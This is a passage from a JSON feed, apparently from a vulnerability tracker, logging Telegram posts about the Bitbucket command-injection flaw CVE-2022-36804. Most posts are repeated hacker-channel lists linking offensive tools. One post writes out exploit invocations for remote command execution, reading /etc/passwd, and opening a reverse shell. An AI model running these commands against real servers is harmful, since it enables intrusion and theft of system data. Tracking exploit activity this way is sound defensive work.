acme.com.\n\nhttps://github.com/Tylous/Limelighter\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\nWebsite:\nwww.ghostclan.org\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-03-29T02:59:56.000000Z"}, {"uuid": "01a8e448-67f0-43b8-ada1-4bf935698e7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "Telegram/T5UoST1xTKmEwnneYpujD0bfi9n2X2betVMnQtUx0124E68h", "content": "", "creation_timestamp": "2025-02-14T09:46:58.000000Z"}, {"uuid": "37c4a021-bbba-4a8a-90e7-b138c83eacdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "https://t.me/arpsyndicate/1320", "content": "#ExploitObserverAlert\n\nCVE-2022-36804\n\nDESCRIPTION: Exploit Observer has 83 entries related to CVE-2022-36804. Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.\n\nFIRST-EPSS: 0.971360000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-04T22:22:58.000000Z"}, {"uuid": "b398137e-905c-43f0-b53c-374474491109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2727", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\n\u200b\u200bAPKiD\n\nAPKiD gives you information about how an APK was made. It identifies many compilers, packers, obfuscators, and other weird stuff. It's PEiD for Android.\n\nhttps://github.com/rednaga/APKiD\n\n\u200b\u200b3klCon\n\nFull Automation Recon tool which works with Small and Medium scopes.\n\nRecommended to use it on VPS, it'll discover secrets and searching for vulnerabilities\n\nhttps://github.com/eslam3kl/3klCon\n\n\u200b\u200bCiLocks \n\nAndroid/IOS Hacking \ud83d\udcf1\n\nCrack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n\nhttps://github.com/tegal1337/CiLocks\n\n\u200b\u200bJWT authentication bypass via jwk header injection\n\nhttps://github.com/frank-leitner/portswigger-websecurity-academy/tree/main/23_JWT_attacks/JWT_authentication_bypass_via_jwk_header_injection\n\n\u200b\u200bPPID Spoofing and Blocking DLLs in C#\n\nUsing InitializeProcThreadAttributeList and UpdateProcThreadAttribute to update attributes of the process to change parent PID and add PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON.\n\nhttps://github.com/crypt0ace/PPIDSpoof\n\nStaying Under the Radar - Part 1 - PPID Spoofing and Blocking DLLs\nhttps://crypt0ace.github.io/posts/Staying-under-the-Radar/\n\n\u200b\u200bCVE-2022-2588\n\nThe #DirtyCred version of exploit to CVE-2022-2588 (an 8-year-old bug) along with a brief write-up. Ideally, the exploit could work on different distros if the kernel is vulnerable.\n\nhttps://github.com/Markakd/CVE-2022-2588\n\n#cve\n\n\u200b\u200bPCredz\n\nThis tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\nhttps://github.com/lgandx/PCredz\n\n\u200b\u200bida_kcpp\n\nAn IDAPython module for way more convienent way to Reverse Engineering iOS kernelcaches.\n\nhttps://github.com/cellebrite-labs/ida_kcpp\n\n\u200b\u200bAwesome-Application-Security-Checklist\n\nIf you are designing, creating, testing your web/mobile application with security in mind, this Checklist of counter-measures can be a good starting point\n\nhttps://github.com/MahdiMashrur/Awesome-Application-Security-Checklist\n\n\u200b\u200buserefuzz\n\nUser-Agent, X-Forwarded-For and Referer SQLI Fuzzer made with python.\n\nhttps://github.com/root-tanishq/userefuzz\n\n\u200b\u200bAPKLab\n\nAndroid Reverse Engineering WorkBench for VS Code.\n\nAPKLab seamlessly integrates the best open-source tools: #Apktool, Jadx, uber-apk-signer, and more to the excellent VS Code so you can focus on app analysis and get it done without leaving the IDE.\n\nhttps://github.com/APKLab/APKLab\n\n\u200b\u200bRemote Method Guesser\n\nA Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints. Java RMI enumeration and bruteforce of remote methods. \n\nhttps://github.com/qtc-de/remote-method-guesser\n\n#java #rmi\n\n\u200b\u200bSyscallslib\n\nA library that automates some clean syscalls to make it easier &amp; faster to implement. its pretty basic code, im using hellsgate (TartarusGate) tech to fetch direct syscalls, and it saves times when needed.\n\nhttps://github.com/ORCx41/Syscallslib\n\n\u200b\u200bCVE-2022-36804 \n\nAtlassian Bitbucket Command Injection\n\nThe script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances.\n\nhttps://github.com/notxesh/CVE-2022-36804-PoC\n\n\u200b\u200bMCPTool\n\nPentesting tool for Minecraft\n\n\u25ab\ufe0f Uses more reliable create process functions like CreateProcessAsUser() and CreateProcessWithTokenW() if the calling process holds the required privileges (automatic detection)\n\u25ab\ufe0f Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no UAC limitations)\n\u25ab\ufe0f Allows to bypass UAC when an administrator password is known (flag --bypass-uac)\n\u25ab\ufe0f Allows redirecting stdin, stdout and stderr to a remote host\n\nhttps://github.com/antonioCoco/RunasCs\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\nWebsite:\nwww.ghostclan.org", "creation_timestamp": "2023-10-17T19:32:46.000000Z"}, {"uuid": "1ac31524-1803-4f41-90b6-e491dfa98999", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/198", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\n\u200b\u200bAPKiD\n\nAPKiD gives you information about how an APK was made. It identifies many compilers, packers, obfuscators, and other weird stuff. It's PEiD for Android.\n\nhttps://github.com/rednaga/APKiD\n\n\u200b\u200b3klCon\n\nFull Automation Recon tool which works with Small and Medium scopes.\n\nRecommended to use it on VPS, it'll discover secrets and searching for vulnerabilities\n\nhttps://github.com/eslam3kl/3klCon\n\n\u200b\u200bCiLocks \n\nAndroid/IOS Hacking \ud83d\udcf1\n\nCrack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n\nhttps://github.com/tegal1337/CiLocks\n\n\u200b\u200bJWT authentication bypass via jwk header injection\n\nhttps://github.com/frank-leitner/portswigger-websecurity-academy/tree/main/23_JWT_attacks/JWT_authentication_bypass_via_jwk_header_injection\n\n\u200b\u200bPPID Spoofing and Blocking DLLs in C#\n\nUsing InitializeProcThreadAttributeList and UpdateProcThreadAttribute to update attributes of the process to change parent PID and add PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON.\n\nhttps://github.com/crypt0ace/PPIDSpoof\n\nStaying Under the Radar - Part 1 - PPID Spoofing and Blocking DLLs\nhttps://crypt0ace.github.io/posts/Staying-under-the-Radar/\n\n\u200b\u200bCVE-2022-2588\n\nThe #DirtyCred version of exploit to CVE-2022-2588 (an 8-year-old bug) along with a brief write-up. Ideally, the exploit could work on different distros if the kernel is vulnerable.\n\nhttps://github.com/Markakd/CVE-2022-2588\n\n#cve\n\n\u200b\u200bPCredz\n\nThis tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\nhttps://github.com/lgandx/PCredz\n\n\u200b\u200bida_kcpp\n\nAn IDAPython module for way more convienent way to Reverse Engineering iOS kernelcaches.\n\nhttps://github.com/cellebrite-labs/ida_kcpp\n\n\u200b\u200bAwesome-Application-Security-Checklist\n\nIf you are designing, creating, testing your web/mobile application with security in mind, this Checklist of counter-measures can be a good starting point\n\nhttps://github.com/MahdiMashrur/Awesome-Application-Security-Checklist\n\n\u200b\u200buserefuzz\n\nUser-Agent, X-Forwarded-For and Referer SQLI Fuzzer made with python.\n\nhttps://github.com/root-tanishq/userefuzz\n\n\u200b\u200bAPKLab\n\nAndroid Reverse Engineering WorkBench for VS Code.\n\nAPKLab seamlessly integrates the best open-source tools: #Apktool, Jadx, uber-apk-signer, and more to the excellent VS Code so you can focus on app analysis and get it done without leaving the IDE.\n\nhttps://github.com/APKLab/APKLab\n\n\u200b\u200bRemote Method Guesser\n\nA Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints. \n\nhttps://github.com/qtc-de/remote-method-guesser\n\n\u200b\u200bSyscallslib\n\nA library that automates some clean syscalls to make it easier &amp; faster to implement. its pretty basic code, im using hellsgate (TartarusGate) tech to fetch direct syscalls, and it saves times when needed.\n\nhttps://github.com/ORCx41/Syscallslib\n\n\u200b\u200bCVE-2022-36804 \n\nAtlassian Bitbucket Command Injection\n\nThe script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances.\n\nThe PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools.\n\nhttps://github.com/notxesh/CVE-2022-36804-PoC\n\nPentesting tool for Minecraft\n\n\u25ab\ufe0f Uses more reliable create process functions like CreateProcessAsUser() and CreateProcessWithTokenW() if the calling process holds the required privileges (automatic detection)\n\u25ab\ufe0f Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no UAC limitations)\n\u25ab\ufe0f Allows to bypass UAC when an administrator password is known (flag --bypass-uac)\n\nhttps://github.com/antonioCoco/RunasCs\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2022-12-20T04:37:50.000000Z"}, {"uuid": "934f87ce-b9da-4f95-b482-2a6efaadf0bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2153", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\n\u200b\u200bAPKiD\n\nAPKiD gives you information about how an APK was made. It identifies many compilers, packers, obfuscators, and other weird stuff. It's PEiD for Android.\n\nhttps://github.com/rednaga/APKiD\n\n\u200b\u200b3klCon\n\nFull Automation Recon tool which works with Small and Medium scopes.\n\nRecommended to use it on VPS, it'll discover secrets and searching for vulnerabilities\n\nhttps://github.com/eslam3kl/3klCon\n\n\u200b\u200bCiLocks \n\nAndroid/IOS Hacking \ud83d\udcf1\n\nCrack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n\nhttps://github.com/tegal1337/CiLocks\n\n\u200b\u200bJWT authentication bypass via jwk header injection\n\nhttps://github.com/frank-leitner/portswigger-websecurity-academy/tree/main/23_JWT_attacks/JWT_authentication_bypass_via_jwk_header_injection\n\n\u200b\u200bPPID Spoofing and Blocking DLLs in C#\n\nUsing InitializeProcThreadAttributeList and UpdateProcThreadAttribute to update attributes of the process to change parent PID and add PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON.\n\nhttps://github.com/crypt0ace/PPIDSpoof\n\nStaying Under the Radar - Part 1 - PPID Spoofing and Blocking DLLs\nhttps://crypt0ace.github.io/posts/Staying-under-the-Radar/\n\n\u200b\u200bCVE-2022-2588\n\nThe #DirtyCred version of exploit to CVE-2022-2588 (an 8-year-old bug) along with a brief write-up. Ideally, the exploit could work on different distros if the kernel is vulnerable.\n\nhttps://github.com/Markakd/CVE-2022-2588\n\n#cve\n\n\u200b\u200bPCredz\n\nThis tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\nhttps://github.com/lgandx/PCredz\n\n\u200b\u200bida_kcpp\n\nAn IDAPython module for way more convienent way to Reverse Engineering iOS kernelcaches.\n\nhttps://github.com/cellebrite-labs/ida_kcpp\n\n\u200b\u200bAwesome-Application-Security-Checklist\n\nIf you are designing, creating, testing your web/mobile application with security in mind, this Checklist of counter-measures can be a good starting point\n\nhttps://github.com/MahdiMashrur/Awesome-Application-Security-Checklist\n\n\u200b\u200buserefuzz\n\nUser-Agent, X-Forwarded-For and Referer SQLI Fuzzer made with python.\n\nhttps://github.com/root-tanishq/userefuzz\n\n\u200b\u200bAPKLab\n\nAndroid Reverse Engineering WorkBench for VS Code.\n\nAPKLab seamlessly integrates the best open-source tools: #Apktool, Jadx, uber-apk-signer, and more to the excellent VS Code so you can focus on app analysis and get it done without leaving the IDE.\n\nhttps://github.com/APKLab/APKLab\n\n\u200b\u200bRemote Method Guesser\n\nA Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints. \n\nhttps://github.com/qtc-de/remote-method-guesser\n\n\u200b\u200bSyscallslib\n\nA library that automates some clean syscalls to make it easier &amp; faster to implement. its pretty basic code, im using hellsgate (TartarusGate) tech to fetch direct syscalls, and it saves times when needed.\n\nhttps://github.com/ORCx41/Syscallslib\n\n\u200b\u200bCVE-2022-36804 \n\nAtlassian Bitbucket Command Injection\n\nThe script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances.\n\nThe PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools.\n\nhttps://github.com/notxesh/CVE-2022-36804-PoC\n\nPentesting tool for Minecraft\n\n\u25ab\ufe0f Uses more reliable create process functions like CreateProcessAsUser() and CreateProcessWithTokenW() if the calling process holds the required privileges (automatic detection)\n\u25ab\ufe0f Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no UAC limitations)\n\u25ab\ufe0f Allows to bypass UAC when an administrator password is known (flag --bypass-uac)\n\nhttps://github.com/antonioCoco/RunasCs\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2022-12-20T04:37:50.000000Z"}, {"uuid": "3ed0f57d-df75-4025-a852-7eaee4981c67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/997", "content": "CVE-2022-36804 - Bitbucket\n\u0414\u043b\u044f versions &lt;8.3.1 (\u0442\u0430\u043a \u043a\u0430\u043a \u043f\u0430\u0442\u0447 \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d)\n\u0421\u043f\u043b\u043e\u0438\u0442 \u0438\u0449\u0435\u0442 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0440\u0435\u043f\u044b \u043d\u0430 \u0445\u043e\u0441\u0442\u0435 \nBitbucket\n \u0434\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n*\n\u0415\u0441\u043b\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0439 \u0440\u0435\u043f\u044b \u043d\u0435\u0442, \u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0444\u0430\u0439\u043b cookie BITBUCKETSESSIONID. \n*\nRCE (Remote Code Execution)\nCVE-2022-36804.py -e rce --cmd \"curl http://example.com/\" http://bitbucket.local:7990/\n\nDownload /etc/passwd\nCVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/\n\nReverse_shell\nCVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/\n\n#bitbucket", "creation_timestamp": "2022-09-20T06:29:08.000000Z"}, {"uuid": "09adc35c-1a0f-4949-8bd4-7e1665eaf648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/4167", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\n\u200b\u200bAPKiD\n\nAPKiD gives you information about how an APK was made. It identifies many compilers, packers, obfuscators, and other weird stuff. It's PEiD for Android.\n\nhttps://github.com/rednaga/APKiD\n\n\u200b\u200b3klCon\n\nFull Automation Recon tool which works with Small and Medium scopes.\n\nRecommended to use it on VPS, it'll discover secrets and searching for vulnerabilities\n\nhttps://github.com/eslam3kl/3klCon\n\n\u200b\u200bCiLocks \n\nAndroid/IOS Hacking \ud83d\udcf1\n\nCrack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n\nhttps://github.com/tegal1337/CiLocks\n\n\u200b\u200bJWT authentication bypass via jwk header injection\n\nhttps://github.com/frank-leitner/portswigger-websecurity-academy/tree/main/23_JWT_attacks/JWT_authentication_bypass_via_jwk_header_injection\n\n\u200b\u200bPPID Spoofing and Blocking DLLs in C#\n\nUsing InitializeProcThreadAttributeList and UpdateProcThreadAttribute to update attributes of the process to change parent PID and add PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON.\n\nhttps://github.com/crypt0ace/PPIDSpoof\n\nStaying Under the Radar - Part 1 - PPID Spoofing and Blocking DLLs\nhttps://crypt0ace.github.io/posts/Staying-under-the-Radar/\n\n\u200b\u200bCVE-2022-2588\n\nThe #DirtyCred version of exploit to CVE-2022-2588 (an 8-year-old bug) along with a brief write-up. Ideally, the exploit could work on different distros if the kernel is vulnerable.\n\nhttps://github.com/Markakd/CVE-2022-2588\n\n#cve\n\n\u200b\u200bPCredz\n\nThis tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\nhttps://github.com/lgandx/PCredz\n\n\u200b\u200bida_kcpp\n\nAn IDAPython module for way more convienent way to Reverse Engineering iOS kernelcaches.\n\nhttps://github.com/cellebrite-labs/ida_kcpp\n\n\u200b\u200bAwesome-Application-Security-Checklist\n\nIf you are designing, creating, testing your web/mobile application with security in mind, this Checklist of counter-measures can be a good starting point\n\nhttps://github.com/MahdiMashrur/Awesome-Application-Security-Checklist\n\n\u200b\u200buserefuzz\n\nUser-Agent, X-Forwarded-For and Referer SQLI Fuzzer made with python.\n\nhttps://github.com/root-tanishq/userefuzz\n\n\u200b\u200bAPKLab\n\nAndroid Reverse Engineering WorkBench for VS Code.\n\nAPKLab seamlessly integrates the best open-source tools: #Apktool, Jadx, uber-apk-signer, and more to the excellent VS Code so you can focus on app analysis and get it done without leaving the IDE.\n\nhttps://github.com/APKLab/APKLab\n\n\u200b\u200bRemote Method Guesser\n\nA Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints. \n\nhttps://github.com/qtc-de/remote-method-guesser\n\n\u200b\u200bSyscallslib\n\nA library that automates some clean syscalls to make it easier &amp; faster to implement. its pretty basic code, im using hellsgate (TartarusGate) tech to fetch direct syscalls, and it saves times when needed.\n\nhttps://github.com/ORCx41/Syscallslib\n\n\u200b\u200bCVE-2022-36804 \n\nAtlassian Bitbucket Command Injection\n\nThe script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances.\n\nThe PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools.\n\nhttps://github.com/notxesh/CVE-2022-36804-PoC\n\nPentesting tool for Minecraft\n\n\u25ab\ufe0f Uses more reliable create process functions like CreateProcessAsUser() and CreateProcessWithTokenW() if the calling process holds the required privileges (automatic detection)\n\u25ab\ufe0f Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no UAC limitations)\n\u25ab\ufe0f Allows to bypass UAC when an administrator password is known (flag --bypass-uac)\n\nhttps://github.com/antonioCoco/RunasCs\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2022-12-19T07:21:28.000000Z"}, {"uuid": "0e9bdd57-7088-49cc-af4f-a9f3cf1cbc45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "Telegram/3aopV-_xbzd1DAIfg9Ho-lfuxVKIjlQiY1B4HOY_D0O9UJs", "content": "", "creation_timestamp": "2022-10-11T07:15:27.000000Z"}, {"uuid": "56b26c04-4ef7-475c-a408-f5b529a68b39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/12126", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\n\u200b\u200bAPKiD\n\nAPKiD gives you information about how an APK was made. It identifies many compilers, packers, obfuscators, and other weird stuff. It's PEiD for Android.\n\nhttps://github.com/rednaga/APKiD\n\n\u200b\u200b3klCon\n\nFull Automation Recon tool which works with Small and Medium scopes.\n\nRecommended to use it on VPS, it'll discover secrets and searching for vulnerabilities\n\nhttps://github.com/eslam3kl/3klCon\n\n\u200b\u200bCiLocks \n\nAndroid/IOS Hacking \ud83d\udcf1\n\nCrack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n\nhttps://github.com/tegal1337/CiLocks\n\n\u200b\u200bJWT authentication bypass via jwk header injection\n\nhttps://github.com/frank-leitner/portswigger-websecurity-academy/tree/main/23_JWT_attacks/JWT_authentication_bypass_via_jwk_header_injection\n\n\u200b\u200bPPID Spoofing and Blocking DLLs in C#\n\nUsing InitializeProcThreadAttributeList and UpdateProcThreadAttribute to update attributes of the process to change parent PID and add PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON.\n\nhttps://github.com/crypt0ace/PPIDSpoof\n\nStaying Under the Radar - Part 1 - PPID Spoofing and Blocking DLLs\nhttps://crypt0ace.github.io/posts/Staying-under-the-Radar/\n\n\u200b\u200bCVE-2022-2588\n\nThe #DirtyCred version of exploit to CVE-2022-2588 (an 8-year-old bug) along with a brief write-up. Ideally, the exploit could work on different distros if the kernel is vulnerable.\n\nhttps://github.com/Markakd/CVE-2022-2588\n\n#cve\n\n\u200b\u200bPCredz\n\nThis tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\nhttps://github.com/lgandx/PCredz\n\n\u200b\u200bida_kcpp\n\nAn IDAPython module for way more convienent way to Reverse Engineering iOS kernelcaches.\n\nhttps://github.com/cellebrite-labs/ida_kcpp\n\n\u200b\u200bAwesome-Application-Security-Checklist\n\nIf you are designing, creating, testing your web/mobile application with security in mind, this Checklist of counter-measures can be a good starting point\n\nhttps://github.com/MahdiMashrur/Awesome-Application-Security-Checklist\n\n\u200b\u200buserefuzz\n\nUser-Agent, X-Forwarded-For and Referer SQLI Fuzzer made with python.\n\nhttps://github.com/root-tanishq/userefuzz\n\n\u200b\u200bAPKLab\n\nAndroid Reverse Engineering WorkBench for VS Code.\n\nAPKLab seamlessly integrates the best open-source tools: #Apktool, Jadx, uber-apk-signer, and more to the excellent VS Code so you can focus on app analysis and get it done without leaving the IDE.\n\nhttps://github.com/APKLab/APKLab\n\n\u200b\u200bRemote Method Guesser\n\nA Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints. \n\nhttps://github.com/qtc-de/remote-method-guesser\n\n\u200b\u200bSyscallslib\n\nA library that automates some clean syscalls to make it easier &amp; faster to implement. its pretty basic code, im using hellsgate (TartarusGate) tech to fetch direct syscalls, and it saves times when needed.\n\nhttps://github.com/ORCx41/Syscallslib\n\n\u200b\u200bCVE-2022-36804 \n\nAtlassian Bitbucket Command Injection\n\nThe script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances.\n\nThe PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools.\n\nhttps://github.com/notxesh/CVE-2022-36804-PoC\n\nPentesting tool for Minecraft\n\n\u25ab\ufe0f Uses more reliable create process functions like CreateProcessAsUser() and CreateProcessWithTokenW() if the calling process holds the required privileges (automatic detection)\n\u25ab\ufe0f Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no UAC limitations)\n\u25ab\ufe0f Allows to bypass UAC when an administrator password is known (flag --bypass-uac)\n\nhttps://github.com/antonioCoco/RunasCs\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2022-12-19T07:21:28.000000Z"}, {"uuid": "85e2095a-e6e3-48bb-9ba9-04f83c3c493c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "Telegram/lnE5W8elp4oMVmzoJZjctvivh3qvv4BJUKoSedq7GcEgUcI", "content": "", "creation_timestamp": "2022-10-05T15:26:13.000000Z"}, {"uuid": "c3d5f046-ad0f-455c-98bc-ec983094c3e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "Telegram/0Yc79ekWpYhWt16EegCKUn_fObd_W8c9GlYeHoI_toZGxZw", "content": "", "creation_timestamp": "2022-10-05T15:25:13.000000Z"}, {"uuid": "4cd40fc6-2fdb-4c35-ab12-477d5ec3c525", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": 